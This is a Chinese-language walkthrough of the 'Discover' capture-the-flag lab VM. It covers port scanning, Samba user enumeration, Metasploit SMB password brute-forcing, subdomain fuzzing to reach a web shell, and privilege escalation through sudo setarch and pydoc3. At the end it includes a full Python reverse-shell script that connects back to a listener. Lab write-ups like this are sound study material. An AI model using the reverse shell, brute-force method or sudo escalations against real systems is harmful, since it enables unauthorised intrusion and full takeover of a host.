# 靶场搭建
下载:Discover
Nat,IP: 192.168.1.160
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
80/tcp open http nginx 1.18.0 | |
|_http-title: Site doesn't have a title (text/html). | |
|_http-server-header: nginx/1.18.0 | |
81/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-server-header: Apache/2.4.56 (Debian) | |
|_http-title: Site doesn't have a title (text/html). | |
139/tcp open netbios-ssn Samba smbd 4.6.2 | |
445/tcp open netbios-ssn Samba smbd 4.6.2 |
samba 枚举用户
S-1-22-1-1000 Unix User\ken (Local User) | |
S-1-22-1-1001 Unix User\takeshi (Local User) |
用 metaploit 爆破一下账吧
msf6 auxiliary(scanner/smb/smb_login) > show options | |
Module options (auxiliary/scanner/smb/smb_login): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is d | |
etected | |
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and | |
password | |
BLANK_PASSWORDS false no Try blank passwords for all users | |
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 | |
CreateSession false no Create a new session for every successful | |
login | |
DB_ALL_CREDS false no Try each user/password couple stored in th | |
e current database | |
DB_ALL_PASS false no Add all passwords in the current database | |
to the list | |
DB_ALL_USERS false no Add all users in the current database to t | |
he list | |
DB_SKIP_EXISTING none no Skip existing credentials stored in the cu | |
rrent database (Accepted: none, user, user | |
&realm) | |
DETECT_ANY_AUTH false no Enable detection of systems accepting any | |
authentication | |
DETECT_ANY_DOMAIN false no Detect if domain is required for the speci | |
fied user | |
PASS_FILE /usr/share/wordlists/rock no File containing passwords, one per line | |
you.txt | |
PRESERVE_DOMAINS true no Respect a username that contains a domain | |
name. | |
Proxies no A proxy chain of format type:host:port[,ty | |
pe:host:port][...] | |
RECORD_GUEST false no Record guest-privileged random logins to t | |
he database | |
RHOSTS 192.168.1.160 yes The target host(s), see https://docs.metas | |
ploit.com/docs/using-metasploit/basics/usi | |
ng-metasploit.html | |
RPORT 445 yes The SMB service port (TCP) | |
SMBDomain . no The Windows domain to use for authenticati | |
on | |
SMBPass no The password for the specified username | |
SMBUser ken no The username to authenticate as | |
STOP_ON_SUCCESS true yes Stop guessing when a credential works for | |
a host | |
THREADS 500 yes The number of concurrent threads (max one | |
per host) | |
USERPASS_FILE no File containing users and passwords separa | |
ted by space, one pair per line | |
USER_AS_PASS false no Try the username as the password for all u | |
sers | |
USER_FILE no File containing usernames, one per line | |
VERBOSE true yes Whether to print output for all attempts | |
View the full module info with the info, or info -d command. |
得到账号密码: ken/kenken
由于看不到地址,所以还需要枚举一下地址
┌──(root㉿kali)-[~] | |
└─# smbmap -u ken -p kenken -H 192.168.1.160 | |
________ ___ ___ _______ ___ ___ __ _______ | |
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\ | |
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :) | |
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/ | |
__/ \ |: \. |(| _ \ |: \. | // __' \ (| / | |
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \ | |
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______) | |
----------------------------------------------------------------------------- | |
SMBMap - Samba Share Enumerator | Shawn Evans - [email protected] | |
https://github.com/ShawnDEvans/smbmap | |
[*] Detected 1 hosts serving SMB | |
[*] Established 1 SMB session(s) | |
[+] IP: 192.168.1.160:445 Name: 192.168.1.160 Status: Authenticated | |
Disk Permissions Comment | |
---- ----------- ------- | |
print$ READ ONLY Printer Drivers | |
IPC$ NO ACCESS IPC Service (Samba 4.13.13-Debian) | |
ken READ, WRITE File Upload Path |
知道了目录 ken,连上去
┌──(root㉿kali)-[~] | |
└─# smbclient //192.168.1.160/ken -U ken | |
Password for [WORKGROUP\ken]: | |
Try "help" to get a list of possible commands. | |
smb: \> ls | |
. D 0 Tue May 28 03:09:04 2024 | |
.. D 0 Mon Jul 3 17:19:50 2023 | |
index.html N 15 Tue Jul 4 06:33:20 2023 | |
7173040 blocks of size 1024. 4754604 blocks available |
传一个 shell.php 上去,直接就下载了
迷茫……
再做目录扫描,81 端口发现 under_construction 目录
打开 403,用 post 请求 curl -X POST "http://192.168.1.160:81/under_construction" -L 得到一个新的域名 todiscover.nyx
添加到 host 中后跑一下子域
┌──(root㉿kali)-[~] | |
└─# wfuzz -t 100 -c --hl=7 -X POST -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.todiscover.nyx" "http://todiscover.nyx/shell.php" |
直接拿到了 shell
# 提权
sudo -l 发现 setarch 权限
sudo - u takeshi setarch $(arch) /bin/sh 拿到了 takeshi 的权限
生成一个 ssh 的密钥对,写入 authorized_keys,登录。
sudo -l 发现有 pydoc3 这个程序,能起一个 web 服务
写一个反向 shell 的 py 在 takeshi 目录下
#!/usr/bin/python3 | |
import os | |
import socket | |
import subprocess | |
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
s.connect(("192.168.1.129",4444)) | |
os.dup2(s.fileno(),0) | |
os.dup2(s.fileno(),1) | |
os.dup2(s.fileno(),2) | |
p=subprocess.call(["/bin/bash","-i"]) |
把 web 服务拉起来: sudo /usr/bin/pydoc3 -n 192.168.1.160 -b -p 8888
访问一下 http://192.168.1.160:8888/
监听,点一下 shell 脚本,就拿到 root 了
